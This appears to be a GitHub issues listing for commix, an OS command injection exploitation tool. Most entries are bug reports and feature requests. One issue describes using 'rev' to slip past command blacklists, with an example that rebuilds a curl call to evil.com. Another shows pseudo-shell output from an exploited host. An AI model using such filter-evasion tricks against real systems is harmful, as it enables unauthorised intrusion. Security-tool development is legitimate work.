commix icon indicating copy to clipboard operation
commix copied to clipboard

Automated All-in-One OS Command Injection Exploitation Tool.

Results 18 commix issues
Sort by recently updated
recently updated
newest added

Can commix run multi-threaded? I didn't find such option in the help menu, perhaps there's a reason for that?

new feature
enhancement

Like SQLMap for SQLi, I think Commix is the de facto standard tool for Command Injection. I am working on a project for automated mobile application security assessment called Mobile...

new feature
enhancement

Linux "rev" function can use to bypass some blacklists. For example : $(echo sl|rev) -> Ls command $(echo lruc | rev) http://evil.com -> Curl command

*nix target
enhancement

There is a problem with parsing newlines in the pseudo shell. Consider these outputs: commix(os_shell) > ls index.php license.txt readme.html wp-activate.php wp-admin wp-blog-header.php wp-comments-post.php wp-config-sample.php wp-config.php wp-content wp-cron.php wp-includes wp-links-opml.php...

*nix target
enhancement

Hi, I was running commix against a time based vulnerable host, and noticed that it took a lot of time to determine the size of a file when using `--file-read`....

enhancement

## What are the running context details? * Installation method `$ sudo apt install -y commix` * Client OS is Kali Linux * Target OS is Ubuntu 22.04 * Program...

enhancement
needs investigation

## Transfer Files Using living off the land techniques after successfully exploiting the webapp vuln. I am aware of the two flags `--file-write` and `--file-read`. But it's just nice to...

new feature
enhancement
needs investigation

## What's the problem (or question)? when i try to run commix, this error occurs: Traceback (most recent call last): File "/Users/abhishek/BB/tools/commix/commix.py", line 18, in __import__("src.utils.version") File "/Users/abhishek/BB/tools/commix/src/utils/version.py", line 17,...

bug
needs investigation

``` Commix version: 4.0-dev#79 Python version: 3.11.8 Operating system: posix Command line: commix.py -l *********** ``` ``` Traceback (most recent call last): File \"commix.py", line 36, in main() File \"commix.py",...

bug
verified

## What's the problem (or question)? Commix has issues when running under an emulated terminal. For example, I tried running it within Python (which does execution differently, it creates an...

bug
verified